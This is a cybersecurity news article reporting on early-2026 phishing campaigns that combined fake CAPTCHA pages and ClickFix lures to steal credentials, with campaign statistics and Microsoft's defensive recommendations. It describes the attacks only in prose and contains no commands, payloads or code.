Attackers Abuse CAPTCHA, ClickFix for Cred Tactics Boost

Cybercriminals are escalating their tactics beyond rudimentary email phishing. During the first quarter of 2026, attackers notably leveraged CAPTCHA pages and ClickFix techniques to significantly amplify these campaigns. This sophisticated approach has boosted credential theft operations to an alarming scale, as detailed in recent findings.

What makes this wave particularly troubling is how quickly the tactics are evolving. Threat actors actively rotated delivery formats from HTML files to SVG attachments, PDFs, and Word documents within just weeks of each other, experimenting to find whatever slipped past email filters most effectively.

By the end of the quarter, PDF attachments emerged as the most common carrier for CAPTCHA-gated phishing content, growing by a staggering 356% in March after months of steady decline. This rapid rotation of file types signals that attackers are running near real-time experiments against email security systems.

Microsoft analysts identified and tracked several of these campaigns in detail, noting how threat actors combined fake CAPTCHA challenges with ClickFix-style manipulation to bypass conventional security controls.

In ClickFix attacks, a fake CAPTCHA prompt tricks users into copying and running a malicious command on their own device, under the false impression they are completing a human verification step.

This removes the need for traditional malware downloads entirely, since the victim unknowingly executes the attacker’s code themselves.

The Tycoon2FA phishing-as-a-service (PhaaS) platform, tracked by Microsoft as Storm-1747, remained a central player in this space during Q1 2026, though its grip on the CAPTCHA-gated phishing landscape weakened over the quarter.

While Tycoon2FA hosted over three-quarters of all CAPTCHA-gated phishing sites at the end of 2025, that share dropped to just 41% by March 2026, showing that more threat actors and phishing kits are picking up the same technique.

How the Attack Chain Unfolds

One of the most striking examples from Q1 2026 was a large three-day campaign between February 23 and February 25, 2026, which delivered over 1.2 million phishing messages to users at more than 53,000 organizations across 23 countries.

Attackers sent emails carrying SVG file attachments with names crafted to match the email theme, such as fake invoice notices, payment alerts, 401K update reminders, and voice message notifications.

When a recipient opened the attached SVG file, their browser would load silently and fetch content from attacker-controlled domains, presenting a fake “security check” CAPTCHA screen.

Once the user completed the fake check, they were redirected to a spoofed sign-in page designed to steal their account credentials.

A separate campaign on March 17, 2026, further highlighted the scale of these operations. Over 1.5 million malicious HTML messages were sent to more than 179,000 organizations in 43 countries, with each email carrying an HTML attachment that launched locally and redirected victims through a staging page before landing on a CAPTCHA-gated phishing site.

The final phishing pages were hosted across multiple PhaaS providers including Tycoon2FA, Kratos, and EvilTokens.

Microsoft recommends organizations act on several fronts to reduce exposure to these threats. Users should be trained through regular phishing simulations and awareness programs so they can recognize fake CAPTCHA challenges and suspicious email attachments before acting on them.

Organizations should enable Safe Links and Safe Attachments in Microsoft Defender for Office 365, activate Zero-hour auto purge (ZAP) to retroactively quarantine malicious messages, and turn on network protection in Microsoft Defender for Endpoint.

Passwordless authentication methods such as FIDO keys or Microsoft Authenticator should be deployed where possible, while conditional access policies should enforce phishing-resistant multifactor authentication for privileged accounts.

Lastly, enabling automatic attack disruption in Microsoft Defender XDR can help contain attacks while giving security teams more time to respond.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.